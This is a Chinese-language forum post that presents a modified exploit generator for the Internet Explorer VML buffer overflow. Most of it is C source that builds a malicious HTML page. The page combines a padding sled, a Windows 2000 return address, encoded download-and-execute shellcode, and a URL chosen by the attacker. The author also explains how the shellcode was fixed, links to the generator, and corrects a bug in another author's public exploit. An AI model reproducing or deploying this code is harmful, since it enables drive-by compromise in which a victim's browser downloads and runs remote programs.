IE VML BufferOverflow Download&Exec Exploit 修改版

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:gyzy

所有代码都修改自NOP的模版,在此表示感谢。方便大家的研究写了个生成器,欢迎大家下载测试。NOP在milw0rm.com上公布的代码里有点小问题。填上了自己的shellcode,将第一个字节改成\xCC后发现shellcode的解码部分连续出现的三个\xFF中的后面两个会被破坏,这和以前的Serv-U溢出一样,所以在头部加入几个修正字节:
__asm{
add [esp+0x2E],0xC0
add [esp+0x2F],0xFF
}
重新测试,成功。测试环境Win2000 Professional SP4 + IE5.0

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "resource.h"

FILE *fp = NULL;
HWND hdlg;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam);
void create(char* url);

/* Search Shellcod
\x80\x44\x24\x1A\xC0
\x80\x44\x24\x1B\xFF
*/

unsigned char sh4llcode[] =
"\x80\x44\x24\x2E\xC0\x80\x44\x24\x2F\xFF\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"
"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66"

"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE"
"\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB"
"\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD"
"\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB"
"\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE"
"\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);
}
}

void create(char* url)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

fp = fopen("test.html", "w+b");

if(!fp)
{
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

for(i=0; i<NOPSIZE; i++)
{
fprintf(fp, "A");
}

fflush(fp);

// print shellcode
memset(buf, 0x90, sizeof(buf));

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(sh4llcode)-1;

memcpy(buf+psize, url, strlen(url));//memcpy(buf+psize, dc, sizeof(dc)-1);
psize += strlen(url);

BYTE end = 0x80;
memcpy(buf+psize, &end, 1);
psize += 1;
// print NCR
convert2ncr(buf, psize);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

}

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
return 0;
}

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
switch (uMsg)
{
case WM_INITDIALOG:
hdlg = hwndDlg;
return true;

case WM_COMMAND:
if (LOWORD(wParam) == IDOK)
{
char url[256];
ZeroMemory(url,256);
GetDlgItemText(hdlg,IDC_EDIT1,url,256);
create(url);
MessageBox(hwndDlg,"恭喜,test.html已生成!","提示",MB_ICONINFORMATION);
}

if (LOWORD(wParam) == IDCANCEL)
{
EndDialog(hwndDlg, LOWORD(wParam));
PostQuitMessage(0);
}
break;
}
return 0;
}

生成器下载:IEOverflow.rar

用户可以根据具体OS语言版本需要改相应jmp ESP 的地址。
其实nop公开的那个也是可用的,只不过他犯了个错误,应该是故意的。zhouzhen兄也发现了,呵呵。 "burl[i] = buf[i] ^ 0xee;"这句错了,应该: burl[i] = url[i] ^ 0xee;

相关日志

发表评论